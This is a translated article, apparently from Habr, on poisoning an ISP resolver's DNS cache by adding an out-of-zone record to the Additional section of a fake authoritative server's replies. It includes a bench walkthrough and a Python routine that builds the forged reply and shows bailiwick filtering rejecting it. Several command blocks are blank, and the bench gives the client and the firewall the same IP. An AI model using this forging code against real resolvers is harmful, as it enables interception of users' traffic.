
Poisoning the cache of an ISP's DNS servers by manipulating the responses of a legitimate, authoritative DNS server

A serious information security problem today is network threats, that is, classes of threats that are carried out through internetworking protocols. One of these protocols is the Domain Name System protocol, DNS.

Threats that exploit the domain name system include those based on modifying DNS transaction packets with the aim of creating a false route on the network. Their danger lies in the possibility of intercepting data exchanged between the clients of network services and the servers of those services.

Modification of DNS transaction packets is rather difficult to detect and carries a high risk for information systems; attacks of this kind include:

The topic of poisoning the cache of an ISP's DNS servers has been covered many times, but here we show with a practical example how easy it is to make the clients of a particular Internet service provider "go" to an IP address of our choosing instead of the correct one for a given domain, without hacking anything or planting trojans, and thereby gain full control over the traffic associated with a specific DNS zone.

Consider a fragment of the global Internet stretching from a client PC to a remote web service, together with the other network elements involved in domain name resolution.


A typical network in which the IP address for a target domain is substituted consists of the following elements:

  1. Client PC (Client).
  2. Internet provider (consisting of: caching DNS server, gateway).
  3. Auxiliary client.
  4. Domain Name System.
  5. Monitoring point (firewall, filter, proxy server).
  6. Information service server.

For the scheme to succeed, the following conditions must hold:

  1. There is an attacker-controlled authoritative DNS server responsible for some zone of the domain name system (any zone will do).
  2. The client is served by an ISP with a caching DNS server, or some other caching DNS server that the client uses is known.
  3. At the moment the ISP's DNS server receives the response from the controlled DNS server, its cache holds no record for the DNS name of the target information service.
  4. The monitoring point holds a database of the IP addresses and domain names of the target information services whose interaction with the client is to be monitored and controlled.

To start the monitoring process, a request is made to resolve a DNS name from the zone for which the controlled DNS server is responsible. This lets the controlled server craft the DNS response to that request with the parameters we want.

According to RFC 1034 and RFC 1035, which define the operation, specification and use of the domain name system, a DNS response may carry records in the "Additional" section. These records hold the IP addresses of auxiliary nodes of various kinds (glue), so that the resolver does not have to query the DNS server again, for example when the primary node whose record is returned in the "Answer" section is unavailable. In the proposed approach, the "Additional" section carries a record that maps the domain name of the target information service to an IP address that actually belongs to the monitoring point, the firewall.

This task (adding the record we need) can be handed to a script that simulates a legitimate DNS server responsible for some DNS zone, no matter what level ...

When the ISP's caching DNS server receives the DNS response while resolving the requested name, it checks whether its cache already contains entries for the names carried in the Additional section of that response; if it does not, it places those entries in its cache. As a result, records that pair the domain names of the monitored information services with IP addresses belonging to the monitoring point end up in the ISP's DNS server cache. From this point on, whenever the client sends a DNS query to resolve the host name of a target information service whose name was stored in the ISP's cache from the Additional section of the response to the "auxiliary" client's query, the ISP's DNS server builds and sends its response to the client from its cache.

Thus the client obtains, for the domain name of the requested information service, the IP address that the controlled DNS server supplied and the ISP stored in its cache before the client's query was processed. That IP address does not belong to the target information service the client requested, but to the monitoring point. Consequently, the client connects to the target information service at the IP address belonging to the monitoring point.
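As an added illustration (this is not the Habr post's own code and not the author's "fakedns" script), the following Python models the two halves of the exchange described above and in the test bench below: the forged reply that answers the auxiliary client's query for "test.b" and smuggles an unsolicited Additional record for "victim.com" pointing at the monitoring point 10.0.33.13, and a caching resolver that either accepts every record in the reply (the behaviour the article reports for its bench) or applies the bailiwick rule that current resolvers use to discard additional-section records lying outside the zone of the server that answered. The 10.0.33.2 address for "test.b" is an assumption, since the page gives none; the parser handles A records only and is deliberately minimal.

```python
import struct

# Constructed values mirroring the test bench; 10.0.33.2 is assumed.
QNAME = "test.b"
LEGIT_IP = "10.0.33.2"
POISON_NAME = "victim.com"
POISON_IP = "10.0.33.13"


def encode_name(name):
    """Encode a dotted name in DNS wire format (no compression)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(data, off):
    """Decode a wire-format name at offset off; follows compression pointers."""
    labels = []
    while True:
        n = data[off]
        if n == 0:
            return ".".join(labels), off + 1
        if n & 0xC0 == 0xC0:  # compression pointer to an earlier name
            ptr = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
            tail, _ = decode_name(data, ptr)
            labels.append(tail)
            return ".".join(labels), off + 2
        labels.append(data[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n


def a_record(name, ip, ttl=3600):
    """One A resource record: NAME TYPE=1 CLASS=IN TTL RDLENGTH RDATA."""
    rdata = bytes(int(x) for x in ip.split("."))
    return encode_name(name) + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata


def build_poisoned_response(txid, qname, answer_ip, extra_name, extra_ip):
    """What the fake authoritative server sends: a correct Answer for qname
    plus an Additional A record for an unrelated name (the poison)."""
    flags = 0x8400  # QR=1 (response), AA=1 (authoritative)
    header = struct.pack("!HHHHHH", txid, flags, 1, 1, 0, 1)  # qd an ns ar
    question = encode_name(qname) + struct.pack("!HH", 1, 1)  # QTYPE A, QCLASS IN
    return header + question + a_record(qname, answer_ip) + a_record(extra_name, extra_ip)


def parse_response(pkt):
    """Return (qname, {'answer': [...], 'authority': [...], 'additional': [...]})
    where each entry is (name, ip, ttl); non-A records are skipped."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    off = 12
    qname, off = decode_name(pkt, off)
    off += 4  # QTYPE + QCLASS
    sections = {"answer": [], "authority": [], "additional": []}
    for sec, count in (("answer", an), ("authority", ns), ("additional", ar)):
        for _ in range(count):
            name, off = decode_name(pkt, off)
            rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
            off += 10
            rdata = pkt[off:off + rdlen]
            off += rdlen
            if rtype == 1 and rdlen == 4:
                sections[sec].append((name, ".".join(str(b) for b in rdata), ttl))
    return qname, sections


def in_bailiwick(name, zone):
    """True if name is the zone apex or lies below it."""
    n, z = name.lower().rstrip("."), zone.lower().rstrip(".")
    return n == z or n.endswith("." + z)


def populate_cache(pkt, zone_of_server, bailiwick_check):
    """Model of the caching resolver. bailiwick_check=False caches every
    record in the reply (the behaviour the article relies on);
    bailiwick_check=True keeps only records under the answering server's zone."""
    cache = {}
    _, sections = parse_response(pkt)
    for sec in ("answer", "additional"):
        for name, ip, ttl in sections[sec]:
            if bailiwick_check and not in_bailiwick(name, zone_of_server):
                continue  # out-of-zone data is discarded, not cached
            cache.setdefault(name, ip)
    return cache


if __name__ == "__main__":
    pkt = build_poisoned_response(0x1234, QNAME, LEGIT_IP, POISON_NAME, POISON_IP)
    print("no bailiwick check:", populate_cache(pkt, "b", False))
    print("with bailiwick check:", populate_cache(pkt, "b", True))
```

The second cache is what a reader reproducing the bench against a maintained recursive resolver should expect to see: the "victim.com" record arrives from a server that is only authoritative for ".b", so it is dropped at the bailiwick check and never reaches the cache.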

When the client connects to the IP address it received, that is, to the monitoring point, a number of control actions are performed there according to the predefined network security policy. These actions include:

  1. Analysis of the transaction received from the client.
  2. Development and application of control actions.
  3. Audit of received transactions and actions taken.
  4. Formation of a request to the information service based on the data of the received client transaction.

At the monitoring point, the firewall, network address translation (NAT) is performed, which makes its operation "transparent" from the point of view of both the client and the target information service.

The approach presented was verified on a test bench consisting of a computer network with the following elements:

  1. A DNS server running BIND 9.4, responsible for the zone ".a", with the domain name "ns.a".
  2. A DNS server running BIND 9.4, responsible for the zone ".b", with the domain name "ns.b".
  3. Client PC with IP Address 10.0.33.13.
  4. The monitoring point is a firewall with an IP address of 10.0.33.13.

Network connectivity is configured between all objects of the network. The network operates as follows.

The DNS servers are configured to forward queries to each other: when one of them receives a query for a domain name from the zone served by the other, it generates and sends a repeated DNS query to that server and, on receiving its reply, generates and sends a DNS response to the client that issued the original query, while at the same time placing the reply from the second server in its cache. This simulates the operation of the ISP's DNS server.

At the 1st stage, the "fakedns" script, which implements the DNS switch, is started on the DNS server responsible for the ".b" zone. The script's task is to process the received DNS query for a domain name from the ".b" zone and add to the DNS response an "Additional" record for the specified domain name (in the example, "victim.com"), corresponding to the target information service whose network interaction with the client is to be monitored and controlled, with the specified IP address (in the example, "10.0.33.13"), corresponding to the monitoring point, the firewall. The "fakedns" script is run with these parameters, simulating the DNS switch, by the command:


At the 2nd stage, a DNS query for the domain name "test.b" is generated on the client and sent to the domain name system, which consists of the DNS servers "ns.a" and "ns.b". In this case the client's primary DNS server (the ISP's DNS server) is "ns.a".

Query structure




At the 3rd stage, a DNS response for the domain name "test.b" is generated and sent with an "Additional" record for the specified domain name "victim.com", corresponding to the information service, which is assigned the specified IP address "10.0.33.13", corresponding to the monitoring point.

DNS response packet structure




At the 4th stage, the cache of the DNS server "ns.a" is checked for the domain name "victim.com", corresponding to the information service but carrying the IP address "10.0.33.13" of the monitoring point.

The check is performed by the command:


At the 5th stage, a response confirms that the domain name "victim.com" is present in the cache of the DNS server "ns.a".

DNS response structure




Obviously, when the client now connects to the victim.com site using the IP address from the DNS response it received, the connection goes to the IP address passed as a parameter to the fakedns script, that is, to the monitoring point, the firewall.

This is verified by the command:


Based on the experiment presented, it can be concluded that, when the listed conditions are met and the DNS switch adds an "Additional" record while processing a query that leads to the resolution of the target information service's domain name, it becomes possible to monitor the client's network interaction with the specified information services, subject to their location and the network topology. Moreover, the client's network interaction with the specified information services can be monitored and controlled both while the connection is being established and during the exchange of data, which is not good ...

Source: https://habr.com/ru/post/321150/
